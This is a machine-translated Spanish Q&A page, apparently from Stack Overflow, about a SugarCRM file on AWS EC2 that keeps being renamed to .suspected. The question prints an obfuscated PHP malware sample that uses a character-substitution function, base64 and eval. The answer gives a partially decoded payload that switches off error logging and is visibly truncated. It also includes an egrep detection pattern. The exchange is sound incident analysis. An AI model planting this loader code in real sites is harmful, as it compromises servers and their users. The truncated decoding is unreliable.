php - ec2 - certbot amazon linux apache
El archivo php se renombra automáticamente a php.suspected (1)
Está algo ofuscado, pero lo he desofensado. La función flnftovr toma una cadena y una matriz como argumentos. Crea una nueva cadena $ ggy usando la fórmula
isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];}
Luego, antepone base64_decode a la cadena.
La cadena es $ s, la matriz es $ koicev. Luego evalúa el resultado de esta manipulación. Entonces, finalmente se crea una cadena:
base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=)
Entonces, lo que realmente se ejecuta en su servidor es:
@ini_set(''error_log'', NULL);
@ini_set(''log_errors'', 0);
@ini_set(''max_execution_time'', 0);
@set_time_limit(0);
if(isset($_SERVER)
encode(serialize($res));
}
Si no creó esto y sospecha que su sitio ha sido pirateado, le sugiero que limpie el servidor y cree una nueva instalación de las aplicaciones que se ejecutan en su servidor.
Desde los últimos 4 días, nos enfrentamos a un problema extraño en nuestro servidor de producción (instancia de AWS EC2) específico para un solo sitio que es SugarCRM.
El problema es /home/site_folder/public_html/include/MassUpdate.php y el archivo se cambia automáticamente a /home/site_folder/public_html/include/MassUpdate.php.suspected
Esto ocurre 2-3 veces en un día con 3-4 horas de espacio. Este problema ocurre solo en el caso de un sitio específico, incluso no ocurre para la reproducción de la réplica del mismo sitio. Incluso revisé el código de ese archivo desde ambos sitios, es lo mismo.
Hemos buscado en Google y encontrado, tal problema ocurre principalmente para los sitios de Wordpress y podría ser debido a un ataque. Pero revisamos nuestro servidor contra el ataque, no hay ninguno. Además, no hay un análisis de virus / malware ejecutándose en el servidor.
¿Qué debemos hacer?
Actualización: Encontramos pocas cosas después de pasar por este enlace . egrep -Rl ''function.*for.*strlen.*isset'' /home/username/public_html/
Y encontramos que hay pocos archivos con el siguiente código de muestra.
<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = ''DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV''.
''0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob''.''zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X='';
$koicev = Array(''1''=>''n'', ''0''=>''4'', ''3''=>''y'', ''2''=>''8'', ''5''=>''E'', ''4''=>''H'', ''7''=>''j'', ''6''=>''w'', ''9''=>''g'', ''8''=>''J'', ''A''=>''Y'', ''C''=>''V'', ''B''=>''3'', ''E''=>''x'', ''D''=>''Q'', ''G''=>''M'', ''F''=>''i'', ''I''=>''P'', ''H''=>''U'', ''K''=>''v'', ''J''=>''W'', ''M''=>''G'', ''L''=>''L'', ''O''=>''X'', ''N''=>''b'', ''Q''=>''B'', ''P''=>''9'', ''S''=>''d'', ''R''=>''I'', ''U''=>''r'', ''T''=>''O'', ''W''=>''z'', ''V''=>''F'', ''Y''=>''q'', ''X''=>''0'', ''Z''=>''C'', ''a''=>''D'', ''c''=>''a'', ''b''=>''K'', ''e''=>''o'', ''d''=>''5'', ''g''=>''m'', ''f''=>''h'', ''i''=>''6'', ''h''=>''c'', ''k''=>''p'', ''j''=>''s'', ''m''=>''A'', ''l''=>''R'', ''o''=>''S'', ''n''=>''u'', ''q''=>''N'', ''p''=>''k'', ''s''=>''7'', ''r''=>''t'', ''u''=>''2'', ''t''=>''l'', ''w''=>''e'', ''v''=>''1'', ''y''=>''T'', ''x''=>''Z'', ''z''=>''f'');
eval(flnftovr($s, $koicev));?>
Parece que hay algo de malware, ¿cómo vamos a eliminarlo de forma permanente?
Gracias